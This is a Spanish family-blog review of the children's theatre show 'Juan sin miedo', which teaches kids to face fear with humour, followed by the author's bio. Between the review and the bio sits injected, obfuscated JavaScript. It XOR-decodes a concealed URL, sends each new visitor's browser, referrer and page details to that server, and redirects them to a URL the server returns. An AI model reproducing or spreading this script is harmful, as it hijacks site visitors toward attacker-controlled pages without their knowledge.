Un ‘Juan sin miedo’ muy divertido

El miedo puede ser más divertido de lo que pensamos si le aplicamos una buena dosis de humor. Y los niños pueden aprender a superarlo en el espetáculo Juan sin miedo de La Caja del Terror.

¿Quién no ha sentido miedo en su niñez? ¿Y quién no lo ha experimentado todavía hoy en día, ya adultos, alguna vez? La pérdida de un ser querido, la falta de expectativas en el trabajo, un desamor… son variantes de la misma sensación.

Quienes tenemos niños volvemos a revivir los temores infantiles de nuestros hijos, aquellos que en algún momento nos hicieron acurrucarnos dentro de la cama, enrollados entre las sábanas, sin atrevernos a sacar los pies ni los brazos más allá de ese espacio confortable que nos ofrecía tranquilidad. O aquel miedo a atravesar el pasillo de casa para ir al baño, si no encendíamos todas las luces, o incluso el pavor de confesar algo malo que habíamos hecho ante el temor a la reacción de nuestros padres…

CartelJuansinmiedoVencer este sentimiento es parte de un aprendizaje que realizamos desde pequeñitos y que nos ayudará a superar otras dificultades cuando seamos mayores, y como en otras facetas de la vida nada mejor que emplear la risa. Eso es lo que propone La caja del Terror con su espectáculo infantil Juan sin miedo, una versión del clásico cuento de los hermanos Grimm, donde los niños aprenden durante una hora cómo superar los miedos con humor. La bruja, la momia, el esqueleto…. a todos se enfrenta Juan sin miedo en su afán de conocer lo qué es realmente sentir terror.

La entrada al local, decorado como si fuera la entrada a la casa de los horrores (los adultos pueden también disfrutar de un espectáculo más a su medida por la noche) ya adelanta que vamos a sentir miedo de verdad. De hecho, hubo un momento en que Elena se tapó los ojos con las manos entreabiertas, no queriendo ver lo que estaba pasando pero sin perder detalle de lo que ocurría en el escenario.

La interacción con los niños, las canciones, la magia y el humor hacen que los peques aprendan que no hay nada mejor que afrontar esta sensación mostrándole nuestro lado más humorístico. ¡Y hasta los truenos pueden ser divertidos si se les escucha con humor…!

 

 

 
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Un comentario en “Un ‘Juan sin miedo’ muy divertido

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *